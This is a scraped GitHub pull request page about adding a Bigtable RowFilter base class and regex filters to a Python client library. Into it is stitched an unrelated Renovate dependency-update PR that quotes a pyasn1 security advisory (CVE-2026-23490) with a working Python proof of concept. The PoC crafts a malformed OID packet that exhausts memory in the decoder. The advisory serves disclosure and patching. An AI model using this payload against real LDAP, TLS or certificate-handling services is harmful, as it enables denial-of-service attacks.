Adding Bigtable RowFilter base class.#1291
Conversation
|
@tseaver I'm going to start with just two here. |
15b001d to
559772b
Compare
|
@tseaver PTAL. I opted not to have regex filters inherit from a parent, but these ended up having also identical unit tests, so maybe it would've been worth it? I figured it was unnecessary since the classes to so little. (FWIW of the 19 filters, 4 of them are regex filters) |
|
If four of the filters take only a |
|
OK. Will re-factor. |
559772b to
e1fe6a4
Compare
|
@tseaver PTAL. I added |
gcloud/bigtable/row.py
Outdated
This comment was marked as spam.
This comment was marked as spam.
Sorry, something went wrong.
This comment was marked as spam.
This comment was marked as spam.
Sorry, something went wrong.
Also adding regex filters for a row key (bytes) and a family name (string). These come from https://github.com/GoogleCloudPlatform/cloud-bigtable-client/blob/6a498cd3e660c7ed18299e980c1658d67661e69b/bigtable-protos/src/main/proto/google/bigtable/v1/bigtable_data.proto#L321-L404 In addition to more classes for primitive properties, parent classes are forthcoming to handle the non-primitive cases of filter Chain, Interleave and Condition (ternary). Also renaming some redunant unit test names in test_column_family.py and ditching use of NotImplementedError in bigtable base classes (for both GC rule and row filter).
e1fe6a4 to
e3c046f
Compare
|
@tseaver PTAL I dropped all the virtual |
|
LGTM |
Adding Bigtable RowFilter base class.
* fix: don't use stale session in rest transport * add test
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS <img width="944" height="207" alt="Screenshot_20251219_160840" src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f" /> <img width="931" height="231" alt="Screenshot_20251219_152815" src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa" /> #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes <details> <summary>pyasn1/pyasn1 (pyasn1)</summary> ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery-sqlalchemy). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi43NC41IiwidXBkYXRlZEluVmVyIjoiNDIuNzQuNSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
Also adding regex filters for a row key (bytes) and a family name (string).
These come from
https://github.com/GoogleCloudPlatform/cloud-bigtable-client/blob/6a498cd3e660c7ed18299e980c1658d67661e69b/bigtable-protos/src/main/proto/google/bigtable/v1/bigtable_data.proto#L321-L404
In addition to more classes for primitive properties, parent classes are forthcoming to handle the non-primitive cases of filter Chain, Interleave and Condition (ternary).
Also renaming some redunant unit test names in
test_column_family.pyand ditching use ofNotImplementedErrorin bigtable base classes (for both GC rule and row filter).